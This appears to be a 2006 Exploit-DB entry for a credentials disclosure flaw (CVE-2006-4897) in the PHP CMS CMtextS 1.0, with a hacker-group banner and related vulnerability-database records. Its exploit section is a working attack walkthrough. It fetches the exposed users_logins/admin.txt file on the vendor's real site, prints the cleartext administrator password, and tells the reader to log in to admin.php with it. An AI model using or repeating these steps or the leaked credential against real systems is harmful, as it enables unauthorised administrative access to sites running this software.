ID EDB-ID:2388
Type exploitdb
Reporter Kacper
Modified 2006-09-17T00:00:00
Description
CMtextS <= 1.0 (users_logins/admin.txt) credentials disclosure vulnerability. CVE-2006-4897. Web application exploit for the PHP platform.
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- CMtextS <= 1.0 Read Admin Password Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: CMtextS 1.0
- [Script site: http://cmtexts.calctc.com/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Found by: Kacper (a.k.a Rahim)
+
- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
- Contact: kacper1964@yahoo.pl
- or
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
- SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Friendship cannot be traded for petty gains @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Dedicated to the person
- without whom I could not live...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://www.cmtexts.pl/path/users_logins/admin.txt
Example:
http://cmtexts.calctc.com/users_logins/admin.txt
Read:
lolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!
> lolskr3czulol < Admin password.
Now go to:
http://cmtexts.calctc.com/admin.php
Login: Admin
pass: lolskr3czulol
greetz ;-)
#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
# milw0rm.com [2006-09-17]
Related records
CVE-2006-4897 (published 2006-09-19T18:07:00)
CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password.
CVSS 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4897
OSVDB:28953 (published 2006-09-17T13:03:51)
CMtextS admin.txt Cleartext Password Disclosure
CVSS 5.0 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE)
Vendor URL: http://cmtexts.calctc.com/
Secunia Advisory ID: 21988 (https://secuniaresearch.flexerasoftware.com/advisories/21988/)
Generic Exploit URL: http://milw0rm.com/exploits/2388
FrSIRT Advisory: ADV-2006-3690
https://vulners.com/osvdb/OSVDB:28953